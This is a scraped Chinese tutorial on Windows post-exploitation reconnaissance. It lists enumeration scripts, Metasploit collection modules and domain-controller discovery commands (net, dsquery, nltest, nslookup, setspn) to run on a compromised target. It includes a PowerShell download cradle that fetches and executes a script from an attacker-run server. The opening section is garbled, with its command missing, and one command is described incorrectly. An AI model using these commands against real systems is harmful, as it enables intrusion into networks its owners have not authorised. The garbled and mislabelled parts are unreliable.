Windows信息收集、渗透测试常用命令 (゚益゚メ) 渗透测试

您所在的位置:网站首页 常用的收集信息方法有哪些 Windows信息收集、渗透测试常用命令 (゚益゚メ) 渗透测试

Windows信息收集、渗透测试常用命令 (゚益゚メ) 渗透测试

2024-07-17 16:12| 来源: 网络整理| 查看: 265

文章目录 简介通用信息收集命令回收站内容获取自动化信息收集自动收集脚本使用msf自动化收集模块 域专用命令定位域控方法

简介

Windows中虽然可视化非常完善,但我们在渗透过程中很多时候只能调用目标命令行,无法使用可视化界面。Windows主机在渗透过程中主要有两大类,一个是工作组模式,一个是域模式,点击查看->工作组和域的区别%c.txt,首先我们在cmd中执行上述命令。(注意这里必须是cmd,这条命令不支持在powershell中执行!!!) 在这里插入图片描述 从中我们可以找到当前用户的SID和一个隐藏文件夹,然后我们移动(cd)到这个目录中 在这里插入图片描述

自动化信息收集 自动收集脚本

HIGS.bat:https://github.com/myh0st/scripts/blob/master/Windows%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/HIGS.bat

winPEAS.bat: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASbat/winPEAS.bat

Powerless.bat: https://github.com/M4ximuss/Powerless

Get-Information.ps1:https://github.com/samratashok/nishang/blob/master/Gather/Get-Information.ps1 使用方法:

本地加载: 直接在本地运行即可,比如说上述HIGS.bat我在本地运行后生成如下文件在这里插入图片描述远程执行:比如Get-Information.ps1 powershell iex(new-object net.webclient).downloadstring('脚本所在公网地址');Get-Information, 这里公网地址可以使用一个vps运行python -m http.server即可 在这里插入图片描述 在这里插入图片描述 使用msf自动化收集模块 (metasploit怎么用上,下): 这里我已经渗透进入一台目标主机,进入了sessions run scraper: 比较全面的系统信息,比如注册表,安装软件,网络环境等信息。run winenum: 收集一些当前系统,用户组相关的信息。 在这里插入图片描述 如果是root用户,这两个命令收集的信息保存的目录是/root/.msf4/logs/scripts/中,如果不是root用户,则会自动保存进入home/用户名/.msf4/logs/scripts/中 在这里插入图片描述 域专用命令

net: Windows网络相关命令

net view /domain: 查询域名(使用net view命令时,要确保域服务器上线,否则会报错6118)net view /domain:域名查询域中的计算机(或者使用net view /all)net group /domain: 查询域中所有用户组net group "domain admins" /domain: 查看那些域管理员组中有哪些用户(net group "enterprise admins" /domain,可以查看域系统管理员用户,enterprise admins权限组权限大于domain admins,是域中权限最大的用户组)net group "domain users" /domain: 查询域中所有用户(或使用net user /domain)net group "enterprise admins" /domain: 查看加入域的服务器列表在这里插入图片描述net config workstation: 查看域信息(当前登录的域)net user 指定用户名 /domain: 查看指定用户的详细信息net time /domain: 查看域控当前的时间(可以哟用于查看域控所在的主机地址,用于寻找域控) 在这里插入图片描述net accounts /domain: 当前域密码策略net localgroup administrators /domain: 查看本机的域管理员(net localgroup administrators命令既可以在域中执行也可以在工作组中执行,而这条命令只能在域中执行)

dsquery: 此工具一般只存在域控中,如果没有目标机器没有此命令,可以自行下载添加。此命令当前只找到Windows server 2012以及之前的版本dsquery下载地址

dsquery computer: 查看当前域中所有机器dsquery user: 查看当前域中所有账户名dsquery group: 查看当前域中所有组名dsquery subnet: 查看当前域所在网段(可以结合nbtscan使用)dsquery site: 查看域内所有的web站点dsquery server: 查看当前域中的服务器(一般只能看到自己和域控的)dsquery user domainroot /name *admin* /limit 240: 查询域内账号名中带admin的前240个结果。在这里插入图片描述

nltest:

nltest /domain_trusts: 查看域信任列表nltest /dclist:de1ay: 查看当前域控制器的机器名在这里插入图片描述

whoami: 查看当前使用的用户信息

whoami /fqdn: 查看当前域信息 定位域控方法

使用ipconfig: 查看详细的网络信息ipconfig /all中会有DNS服务器信息,而一般这个DNS服务器就是域控所在的位置。在这里插入图片描述

nslookup: 一般address中的目标地址即为域控所在,如果这里显示为::1则代表本机即为域控。在这里插入图片描述

如果权限足够可以使用nslookup -type=all _ldap._tcp.dc._msdcs.域名.com查看域控详细信息。 在这里插入图片描述还可以查看域内邮件服务器(nslookup -q=mx 域名.com)和DNS服务器(nslookup -q=ns 域名.com) 在这里插入图片描述

setspn: 可以使用setspn -q */*或setspn -T 域名.com -q */*定位

net group: 使用net group "domain controllers" /domain查看域控名称 在这里插入图片描述



【本文地址】


今日新闻


推荐新闻


    CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3